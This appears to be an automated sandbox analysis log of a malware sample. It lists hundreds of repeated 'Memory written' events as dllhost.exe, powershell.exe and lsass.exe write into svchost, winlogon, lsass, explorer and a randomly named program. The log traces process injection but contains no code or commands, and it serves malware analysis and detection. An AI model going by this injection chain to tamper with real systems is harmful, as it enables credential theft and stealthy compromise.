Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: E0FCD97010Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEE30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B8D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B8D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24AE77D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209A4BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C95C650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 16BA4E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24AE77D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209A4BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FB7A020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 19C72DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 143A2940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 16BA4E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15BA5ED0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 19C72DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15BA5ED0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 10B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 10D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 6B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 29D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 29F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: FD0000
